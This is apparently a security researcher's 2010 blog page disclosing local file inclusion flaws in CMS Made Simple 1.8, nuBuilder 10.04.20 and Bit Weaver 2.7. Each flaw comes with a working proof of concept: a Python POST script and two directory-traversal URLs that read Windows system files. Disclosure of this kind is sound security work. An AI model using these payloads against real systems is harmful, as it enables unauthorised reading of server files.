This site is soon to be deprecated by http://www.johnleitch.net
Showing posts with label Local File Inclusion. Show all posts
Showing posts with label Local File Inclusion. Show all posts

Sunday, July 11, 2010

CMS Made Simple 1.8 Local File Inclusion

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

PoC
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()

Monday, July 5, 2010

nuBuilder 10.04.20 Local File Inclusion

A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini

Thursday, July 1, 2010

Bit Weaver 2.7 Local File Inclusion

A local file inclusion vulnerability in Bit Weaver 2.7 can be exploited to include arbitrary files.

PoC
http://localhost/bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini

Sunday, May 23, 2010